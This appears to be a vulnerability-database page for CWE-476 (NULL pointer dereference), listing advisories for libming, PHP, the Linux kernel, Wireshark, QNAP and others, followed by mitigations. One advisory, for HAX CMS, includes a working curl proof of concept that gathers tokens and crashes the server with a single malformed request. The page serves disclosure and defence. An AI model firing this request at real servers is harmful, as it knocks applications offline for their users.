Common Weakness Enumeration

CWE-476

Allowed

NULL Pointer Dereference

Abstraction: Base · Status: Stable

The product dereferences a pointer that it expects to be valid but is NULL.

6310 vulnerabilities reference this CWE, most recent first.

GHSA-9QFV-2W67-MH77

Vulnerability from github – Published: 2022-05-14 01:29 – Updated: 2022-05-14 01:29
VLAI
Details

An invalid memory address dereference was discovered in getString in util/decompile.c in libming 0.4.8 for CONSTANT16 data. The vulnerability causes a segmentation fault and application crash, which leads to denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-7870"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-03-08T18:29:00Z",
    "severity": "MODERATE"
  },
  "details": "An invalid memory address dereference was discovered in getString in util/decompile.c in libming 0.4.8 for CONSTANT16 data. The vulnerability causes a segmentation fault and application crash, which leads to denial of service.",
  "id": "GHSA-9qfv-2w67-mh77",
  "modified": "2022-05-14T01:29:17Z",
  "published": "2022-05-14T01:29:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7870"
    },
    {
      "type": "WEB",
      "url": "https://github.com/libming/libming/issues/117"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892260"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2018/04/msg00008.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QH3-H8F3-PXRF

Vulnerability from github – Published: 2022-05-14 01:45 – Updated: 2022-05-14 01:45
VLAI
Details

ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM("WScript.Shell").

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-19395"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-11-20T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM(\"WScript.Shell\").",
  "id": "GHSA-9qh3-h8f3-pxrf",
  "modified": "2022-05-14T01:45:24Z",
  "published": "2022-05-14T01:45:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19395"
    },
    {
      "type": "WEB",
      "url": "https://bugs.php.net/bug.php?id=77177"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20181221-0005"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105989"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QJ3-XGH5-M3V7

Vulnerability from github – Published: 2022-05-24 19:08 – Updated: 2022-05-24 19:08
VLAI
Details

An issue has been found in function DCTStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a NULL pointer dereference (invalid read of size 1) .

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-19470"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-21T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been found in function DCTStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a NULL pointer dereference (invalid read of size 1) .",
  "id": "GHSA-9qj3-xgh5-m3v7",
  "modified": "2022-05-24T19:08:33Z",
  "published": "2022-05-24T19:08:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19470"
    },
    {
      "type": "WEB",
      "url": "https://github.com/flexpaper/pdf2json/issues/31"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-9QMP-F2HC-7J5X

Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2025-04-20 03:36
VLAI
Details

An exploitable null pointer dereference vulnerability exists in the Web Application /forms/web_runScript iw_filename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-8726"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-13T19:59:00Z",
    "severity": "HIGH"
  },
  "details": "An exploitable null pointer dereference vulnerability exists in the Web Application /forms/web_runScript iw_filename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server.",
  "id": "GHSA-9qmp-f2hc-7j5x",
  "modified": "2025-04-20T03:36:05Z",
  "published": "2022-05-13T01:01:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-8726"
    },
    {
      "type": "WEB",
      "url": "http://www.talosintelligence.com/reports/TALOS-2016-0240"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QRW-CMG5-G8VQ

Vulnerability from github – Published: 2026-04-27 18:32 – Updated: 2026-05-06 21:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

EDAC/mc: Fix error path ordering in edac_mc_alloc()

When the mci->pvt_info allocation in edac_mc_alloc() fails, the error path will call put_device() which will end up calling the device's release function.

However, the init ordering is wrong such that device_initialize() happens after the failed allocation and thus the device itself and the release function pointer are not initialized yet when they're called:

MCE: In-kernel MCE decoding enabled. ------------[ cut here ]------------ kobject: '(null)': is not initialized, yet kobject_put() is being called. WARNING: lib/kobject.c:734 at kobject_put, CPU#22: systemd-udevd CPU: 22 UID: 0 PID: 538 Comm: systemd-udevd Not tainted 7.0.0-rc1+ #2 PREEMPT(full) RIP: 0010:kobject_put Call Trace: edac_mc_alloc+0xbe/0xe0 [edac_core] amd64_edac_init+0x7a4/0xff0 [amd64_edac] ? __pfx_amd64_edac_init+0x10/0x10 [amd64_edac] do_one_initcall ...

Reorder the calling sequence so that the device is initialized and thus the release function pointer is properly set before it can be used.

This was found by Claude while reviewing another EDAC patch.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-31689"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-27T18:16:54Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/mc: Fix error path ordering in edac_mc_alloc()\n\nWhen the mci-\u003epvt_info allocation in edac_mc_alloc() fails, the error path\nwill call put_device() which will end up calling the device\u0027s release\nfunction.\n\nHowever, the init ordering is wrong such that device_initialize() happens\n*after* the failed allocation and thus the device itself and the release\nfunction pointer are not initialized yet when they\u0027re called:\n\n  MCE: In-kernel MCE decoding enabled.\n  ------------[ cut here ]------------\n  kobject: \u0027(null)\u0027: is not initialized, yet kobject_put() is being called.\n  WARNING: lib/kobject.c:734 at kobject_put, CPU#22: systemd-udevd\n  CPU: 22 UID: 0 PID: 538 Comm: systemd-udevd Not tainted 7.0.0-rc1+ #2 PREEMPT(full)\n  RIP: 0010:kobject_put\n  Call Trace:\n   \u003cTASK\u003e\n   edac_mc_alloc+0xbe/0xe0 [edac_core]\n   amd64_edac_init+0x7a4/0xff0 [amd64_edac]\n   ? __pfx_amd64_edac_init+0x10/0x10 [amd64_edac]\n   do_one_initcall\n   ...\n\nReorder the calling sequence so that the device is initialized and thus the\nrelease function pointer is properly set before it can be used.\n\nThis was found by Claude while reviewing another EDAC patch.",
  "id": "GHSA-9qrw-cmg5-g8vq",
  "modified": "2026-05-06T21:31:30Z",
  "published": "2026-04-27T18:32:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31689"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/51520e03e70d6c73e33ee7cbe0319767d05764fe"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/75825648ce984ca4cebb28e4bd2bf8c3a7e837c5"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/87ce8ae511962e105bcb3534944208c6a9471ed9"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/aae95970fad2127a1bd49d8713c7cd0677dcd2d6"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d20e98c2df9354cc744431ad8ccbf49405b8b40f"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d3de72e2a2b9ee3a57734c1c068823e41a707715"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QX5-GP64-8FHF

Vulnerability from github – Published: 2022-05-14 01:57 – Updated: 2022-05-14 01:57
VLAI
Details

wernsey/bitmap before 2018-08-18 allows a NULL pointer dereference via a 4-bit image.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-17073"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-16T02:29:00Z",
    "severity": "HIGH"
  },
  "details": "wernsey/bitmap before 2018-08-18 allows a NULL pointer dereference via a 4-bit image.",
  "id": "GHSA-9qx5-gp64-8fhf",
  "modified": "2022-05-14T01:57:27Z",
  "published": "2022-05-14T01:57:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17073"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wernsey/bitmap/issues/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QX9-2278-6VPX

Vulnerability from github – Published: 2022-05-17 03:40 – Updated: 2022-05-17 03:40
VLAI
Details

The USB subsystem in Wireshark 1.12.x before 1.12.12 and 2.x before 2.0.4 mishandles class types, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-5354"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-08-07T16:59:00Z",
    "severity": "MODERATE"
  },
  "details": "The USB subsystem in Wireshark 1.12.x before 1.12.12 and 2.x before 2.0.4 mishandles class types, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.",
  "id": "GHSA-9qx9-2278-6vpx",
  "modified": "2022-05-17T03:40:38Z",
  "published": "2022-05-17T03:40:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5354"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wireshark/wireshark/commit/2cb5985bf47bdc8bea78d28483ed224abdd33dc6"
    },
    {
      "type": "WEB",
      "url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12356"
    },
    {
      "type": "WEB",
      "url": "https://www.wireshark.org/security/wnpa-sec-2016-33.html"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2016/dsa-3615"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/06/09/3"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/91140"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QXW-372M-V533

Vulnerability from github – Published: 2025-09-05 18:31 – Updated: 2025-11-25 21:32
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

media: iris: Fix NULL pointer dereference

A warning reported by smatch indicated a possible null pointer dereference where one of the arguments to API "iris_hfi_gen2_handle_system_error" could sometimes be null.

To fix this, add a check to validate that the argument passed is not null before accessing its members.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-39708"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-05T18:15:48Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: iris: Fix NULL pointer dereference\n\nA warning reported by smatch indicated a possible null pointer\ndereference where one of the arguments to API\n\"iris_hfi_gen2_handle_system_error\" could sometimes be null.\n\nTo fix this, add a check to validate that the argument passed is not\nnull before accessing its members.",
  "id": "GHSA-9qxw-372m-v533",
  "modified": "2025-11-25T21:32:04Z",
  "published": "2025-09-05T18:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-39708"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/0f837559ccdd275c5a059e6ac4d5034b03409f1d"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/992ddee3c0da5f113ba86892ace467c1ac645538"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9R22-FHXQ-HH2C

Vulnerability from github – Published: 2025-08-29 18:30 – Updated: 2025-09-22 18:30
VLAI
Details

A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.

We have already fixed the vulnerability in the following versions: QTS 5.2.5.3145 build 20250526 and later QuTS hero h5.2.5.3138 build 20250519 and later

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-30267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-29T18:15:38Z",
    "severity": "MODERATE"
  },
  "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.5.3145 build 20250526 and later\nQuTS hero h5.2.5.3138 build 20250519 and later",
  "id": "GHSA-9r22-fhxq-hh2c",
  "modified": "2025-09-22T18:30:31Z",
  "published": "2025-08-29T18:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30267"
    },
    {
      "type": "WEB",
      "url": "https://www.qnap.com/en/security-advisory/qsa-25-21"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-9R33-XHW8-4QQP

Vulnerability from github – Published: 2026-05-19 19:51 – Updated: 2026-06-09 11:57
VLAI
Summary
HAX CMS: Denial of Service using Malicious Import Request
Details

Summary

The HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.

Details

The createSite remote import flow does not complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.

The crash occurs because createSite passes a file object without originalname, while HAXCMSFile.save() immediately dereferences tmpFile.originalname.replace(...).

As a result:

  • the request reaches privileged code inside createSite
  • the server hits the remote file handling path
  • the process crashes before downloadAndSaveFile() performs the outbound request
  • no imported file is written into the site directory

Affected Resources

  • src/routes/createSite.js:176
  • src/lib/HAXCMSFile.js:25
  • system/api/createSite

PoC

  1. Obtain a JWT by logging in with valid credentials.
JWT=$(curl -s -X POST 'http://127.0.0.1:3000/system/api/login' \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}' | grep -o '"jwt":"[^"]*"' | head -1 | cut -d'"' -f4)
  1. Extract the required tokens from the connectionSettings endpoint.
SETTINGS=$(curl -s 'http://127.0.0.1:3000/system/api/connectionSettings')
ROOT_TOKEN=$(printf '%s' "$SETTINGS" | grep -o '"token":"[^"]*"' | head -1 | cut -d'"' -f4)
USER_TOKEN=$(printf '%s' "$SETTINGS" | grep -o 'createSite[^"]*' | grep -o 'user_token=[^"&]*' | cut -d'=' -f2)
  1. Send the malformed request to crash the server.
curl -i -X POST "http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN&jwt=$JWT" \
  -H 'Content-Type: application/json' \
  -d "{
    \"token\": \"$ROOT_TOKEN\",
    \"site\": { \"name\": \"dos-poc\" },
    \"theme\": {},
    \"build\": {
      \"structure\": \"import\",
      \"type\": \"import\",
      \"items\": [],
      \"files\": {
        \"files/poc.txt\": \"http://127.0.0.1:8888/poc.txt\"
      }
    }
  }"

Empty-Reply

The curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading 'replace') and nodemon reports the application as crashed.

crash-detail

Impact

An authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@haxtheweb/haxcms-nodejs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46357"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T19:51:51Z",
    "nvd_published_at": "2026-06-05T20:17:33Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.\n\n### Details\n\nThe `createSite` remote import flow does **not** complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.\n\nThe crash occurs because `createSite` passes a file object without `originalname`, while `HAXCMSFile.save()` immediately dereferences `tmpFile.originalname.replace(...)`.\n\nAs a result:\n\n- the request reaches privileged code inside `createSite`\n- the server hits the remote file handling path\n- the process crashes before `downloadAndSaveFile()` performs the outbound request\n- no imported file is written into the site directory\n\n### Affected Resources\n\n- src/routes/createSite.js:176\n- src/lib/HAXCMSFile.js:25\n- system/api/createSite\n\n### PoC\n\n1. Obtain a JWT by logging in with valid credentials.\n\n```bash\nJWT=$(curl -s -X POST \u0027http://127.0.0.1:3000/system/api/login\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"admin\",\"password\":\"admin\"}\u0027 | grep -o \u0027\"jwt\":\"[^\"]*\"\u0027 | head -1 | cut -d\u0027\"\u0027 -f4)\n```\n\n2. Extract the required tokens from the `connectionSettings` endpoint.\n\n```bash\nSETTINGS=$(curl -s \u0027http://127.0.0.1:3000/system/api/connectionSettings\u0027)\nROOT_TOKEN=$(printf \u0027%s\u0027 \"$SETTINGS\" | grep -o \u0027\"token\":\"[^\"]*\"\u0027 | head -1 | cut -d\u0027\"\u0027 -f4)\nUSER_TOKEN=$(printf \u0027%s\u0027 \"$SETTINGS\" | grep -o \u0027createSite[^\"]*\u0027 | grep -o \u0027user_token=[^\"\u0026]*\u0027 | cut -d\u0027=\u0027 -f2)\n```\n\n3. Send the malformed request to crash the server.\n\n```bash\ncurl -i -X POST \"http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN\u0026jwt=$JWT\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \"{\n    \\\"token\\\": \\\"$ROOT_TOKEN\\\",\n    \\\"site\\\": { \\\"name\\\": \\\"dos-poc\\\" },\n    \\\"theme\\\": {},\n    \\\"build\\\": {\n      \\\"structure\\\": \\\"import\\\",\n      \\\"type\\\": \\\"import\\\",\n      \\\"items\\\": [],\n      \\\"files\\\": {\n        \\\"files/poc.txt\\\": \\\"http://127.0.0.1:8888/poc.txt\\\"\n      }\n    }\n  }\"\n```\n\n\u003cimg width=\"953\" height=\"433\" alt=\"Empty-Reply\" src=\"https://github.com/user-attachments/assets/f3562726-2e64-4af6-a06c-8356dc7708da\" /\u003e\n\n\nThe curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading \u0027replace\u0027) and nodemon reports the application as crashed.\n\n\u003cimg width=\"950\" height=\"278\" alt=\"crash-detail\" src=\"https://github.com/user-attachments/assets/1fbc80fb-4c2d-4bc6-af29-c3e9c45e8ad1\" /\u003e\n\n\n### Impact\n\nAn authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.",
  "id": "GHSA-9r33-xhw8-4qqp",
  "modified": "2026-06-09T11:57:10Z",
  "published": "2026-05-19T19:51:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-9r33-xhw8-4qqp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46357"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/haxtheweb/issues"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "HAX CMS: Denial of Service using Malicious Import Request"
}

Mitigation MIT-56
Implementation

For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].

Mitigation
Requirements

Select a programming language that is not susceptible to these issues.

Mitigation
Implementation

Check the results of all functions that return a value and verify that the value is non-null before acting upon it.

Mitigation
Architecture and Design

Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.

Mitigation
Implementation

Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.

No CAPEC attack patterns related to this CWE.